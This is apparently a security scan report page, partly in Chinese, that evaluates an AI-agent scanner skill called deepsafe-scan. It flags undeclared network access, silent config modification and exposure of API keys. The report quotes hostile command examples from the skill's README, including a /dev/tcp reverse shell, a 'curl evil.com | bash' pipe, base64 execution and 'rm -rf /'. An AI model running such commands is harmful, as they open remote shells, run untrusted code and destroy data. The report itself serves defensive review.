中文 EN

扫描报告

扫描新文件

高风险 — 风险评分 68/100
上次扫描:1 天前 重新扫描
68 /100
deepsafe-scan
Preflight security scanner for AI coding agents - scans deployment config, skills/MCP servers, memory/sessions, and AI agent config files
DeepSafe Scan is a legitimate security scanner but contains undeclared behaviors: auto-modifies openclaw.json config to enable endpoints, and uses network access via subprocess that is not declared in allowed-tools.
技能名称deepsafe-scan
分析耗时77.2s
引擎pi
不要安装此技能
Do not install without explicit user consent. Request network access declaration in SKILL.md. Review config auto-modification behavior.

攻击链 5 步

入口 Skill installed via legitimate OpenClaw marketplace
SKILL.md:1
提权 Scanner reads user's openclaw.json config
scripts/scan.py:1
提权 Auto-modifies openclaw.json to enable chatCompletions endpoint
scripts/llm_client.py:213
提权 Credential auto-detection accesses ANTHROPIC_API_KEY/OPENAI_API_KEY from environment
scripts/llm_client.py:124
提权 API key passed to subprocess as argv, visible in process listing
scripts/scan.py:88

安全发现 5 项

严重性 安全发现 位置
高危
Network access not declared in SKILL.md 文档欺骗
The skill uses urllib to make HTTP requests to LLM APIs (api.anthropic.com, api.openai.com, OpenClaw Gateway) but SKILL.md only declares Bash(python3:*), Bash(cat:*), and Read. Network access is a critical permission that should be declared.
urllib.request.Request with Bearer token to LLM endpoints
→ Add network:READ to allowed-tools declaration in SKILL.md, or restructure to use only declared shell access for all network operations
 scripts/llm_client.py:1
高危
Auto-modifies openclaw.json without user consent 权限提升
The _ensure_chat_completions_enabled() function silently modifies the user's openclaw.json config to enable chatCompletions endpoint. This unauthorized configuration change bypasses user consent and trust boundaries.
cfg.setdefault(...).setdefault(...).setdefault(...).setdefault('chatCompletions', {})['enabled'] = True
→ Remove auto-modification or prompt user explicitly before making config changes
 scripts/llm_client.py:213
中危
API credentials passed as command-line arguments 凭证窃取
Probe scripts receive --api-key via subprocess.run() argv, exposing credentials in process listing (visible via ps). While necessary for function, this exposes secrets to process inspection.
cmd = [sys.executable, str(script), '--api-base', api_base, '--api-key', client.api_key, ...]
→ Use environment variables or file-based credential passing instead of argv
 scripts/scan.py:88
中危
Auto-detection of API credentials from multiple sources 敏感访问
The LLM client auto-detects and uses credentials from OpenClaw config, environment variables (ANTHROPIC_API_KEY, OPENAI_API_KEY), and explicit arguments. While necessary for the scanner's function, this represents invasive credential access.
anthropic_key = os.environ.get('ANTHROPIC_API_KEY', '')
→ Document this behavior clearly and provide --no-llm option to disable credential detection
 scripts/llm_client.py:124
低危
README.md contains example malicious patterns 文档欺骗
The README.md lines 155-161 contain documented examples of dangerous patterns (reverse shell, curl|bash RCE, base64 exec, rm -rf). These are documentation/examples for what the scanner detects, not actual malicious code, but could trigger false positives in some scanners.
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
→ Move these examples to a separate 'threat-patterns' reference document to avoid confusion
 README.md:155
资源类型声明权限推断权限状态证据
文件系统 READ READ ✓ 一致 SKILL.md: allowed-tools includes Read
命令执行 WRITE WRITE ✓ 一致 SKILL.md: allowed-tools includes Bash(python3:*), Bash(cat:*)
网络访问 NONE READ ✗ 越权 scripts/scan.py: subprocess runs probes making urllib HTTP calls; llm_client.py:…
环境变量 NONE READ ✗ 越权 llm_client.py: reads ANTHROPIC_API_KEY, OPENAI_API_KEY, OPENCLAW_GATEWAY_TOKEN
5 严重 15 项发现
💀
严重 危险命令 危险 Shell 命令
bash -i >&
README.md:155
💀
严重 危险命令 危险 Shell 命令
/dev/tcp/
README.md:155
💀
严重 危险命令 危险 Shell 命令
curl https://evil.com/x.sh \| bash
README.md:156
🔒
严重 编码执行 Base64 编码执行(代码混淆)
base64 -d
README.md:159
💀
严重 危险命令 危险 Shell 命令
rm -rf /
README.md:161
🔗
中危 外部 URL 外部 URL
https://img.shields.io/badge/python-3.9%2B-blue.svg
README.md:5
🔗
中危 外部 URL 外部 URL
https://python.org
README.md:5
🔗
中危 外部 URL 外部 URL
https://img.shields.io/badge/deps-zero-green.svg
README.md:6
🔗
中危 外部 URL 外部 URL
https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg
README.md:7
🔗
中危 外部 URL 外部 URL
https://evil.com/x.sh
README.md:156
🔗
中危 外部 URL 外部 URL
https://healthcheck.dev-tools.sh/ping
demo/awesome-ai-rules/AGENTS.md:19
🔗
中危 外部 URL 外部 URL
https://api.analytics-cdn.dev/v1/event
demo/awesome-ai-rules/CLAUDE.md:15
🔗
中危 外部 URL 外部 URL
http://127.0.0.1:11434/v1
scripts/probes/persuasion_probe.py:391
🔗
中危 外部 URL 外部 URL
https://hooks\.slack\.com/services/T[A-Z0-9
scripts/scan.py:932
📧
提示 邮箱 邮箱地址
[email protected]
README.md:157

目录结构

19 文件 · 264.4 KB · 5683 行
Python 6f · 3481L Markdown 8f · 1232L JSON 4f · 967L Text 1f · 3L
├─ 📁 data
│ ├─ 📋 halueval_samples.json JSON 901L · 65.9 KB
│ ├─ 📋 manipulation_persuasion_topics.json JSON 40L · 981 B
│ ├─ 📋 prompts.json JSON 21L · 5.0 KB
│ └─ 📄 qa_evaluation_instruction.txt Text 3L · 224 B
├─ 📁 demo
│ └─ 📁 awesome-ai-rules
│ ├─ 📝 AGENTS.md Markdown 24L · 473 B
│ ├─ 📝 CLAUDE.md Markdown 26L · 627 B
│ └─ 📝 README.md Markdown 26L · 681 B
├─ 📁 docs
│ └─ 📝 plan-cross-platform-evolution.md Markdown 615L · 22.6 KB
├─ 📁 scripts
│ ├─ 📁 probes
│ │ ├─ 🐍 deception_probe.py Python 483L · 19.5 KB
│ │ ├─ 🐍 halueval_probe.py Python 327L · 11.4 KB
│ │ ├─ 🐍 persuasion_probe.py Python 475L · 17.8 KB
│ │ └─ 🐍 sandbagging_probe.py Python 415L · 14.3 KB
│ ├─ 🐍 llm_client.py Python 234L · 8.7 KB
│ └─ 🐍 scan.py Python 1547L · 75.9 KB
├─ 📋 _meta.json JSON 5L · 132 B
├─ 📝 AGENTS.md Markdown 75L · 2.5 KB
├─ 📝 CLAUDE.md Markdown 79L · 2.5 KB
├─ 📝 README.md Markdown 255L · 9.3 KB
└─ 📝 SKILL.md Markdown 132L · 5.9 KB

依赖分析 1 项

包名版本来源已知漏洞备注
urllib (stdlib) N/A python3 built-in Zero external dependencies

安全亮点

✓ Uses only Python stdlib (no external dependencies) - reduces supply chain risk
✓ Skips LLM features gracefully when no API credentials found (--no-llm flag works)
✓ Legitimate security scanning tool with documented purpose
✓ Probes are executed as subprocess with python3 - aligned with declared Bash(python3:*) permission
✓ Open source with transparent implementation